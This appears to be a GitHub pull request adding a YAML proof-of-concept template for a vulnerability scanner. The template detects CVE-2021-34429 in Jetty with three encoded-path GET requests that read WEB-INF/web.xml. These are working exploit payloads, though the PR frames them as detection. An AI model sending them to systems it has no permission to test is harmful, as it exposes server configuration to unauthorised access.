### PR TITLE
add poc-yaml-jetty-cve-2021-34429.yaml

### DIFF
--- a/pocs/jetty-cve-2021-34429-FileRead.yaml
+++ b/pocs/jetty-cve-2021-34429-FileRead.yaml
@@ -1,0 +1,36 @@
+name: poc-yaml-jetty-cve-2021-34429
+manual: true
+transport: http
+rules:
+  r0:
+    request:
+      cache: FALSE
+      method: GET
+      path: /%u002e/WEB-INF/web.xml
+    expression:
+      response.status == 200 && response.body.bcontains(b"<web-app version=")
+  r1:
+    request:
+      cache: FALSE
+      method: GET
+      path: /.%00/WEB-INF/web.xml
+    expression:
+      response.status == 200 && response.body.bcontains(b"<web-app version=")
+  r2:
+    request:
+      cache: FALSE
+      method: GET
+      path: /a/b/..%00/WEB-INF/web.xml
+    expression:
+      response.status == 200 && response.body.bcontains(b"<web-app version=")
+expression:
+  r0() || r1() || r2()
+detail:
+  author: 落花
+  links:
+    - https://xz.aliyun.com/t/10039
+  fingerprint:
+    info:
+      name: "Jetty"
+      version: 9.4.37 ≤ Jetty ≤ 9.4.42, 10.0.1 ≤ Jetty ≤ 10.0.5, 11.0.1 ≤ Jetty ≤ 11.0.5
+      type: "web_application"


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Jetty Ambiguous Paths Information Disclosure Vulnerability (CVE-2021-34429)
## 测试环境
https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-34429
## 备注
<img width="1165" alt="image" src="https://user-images.githubusercontent.com/70683161/157004895-72d02d0a-676a-4cee-904c-144e6e537d9b.png">
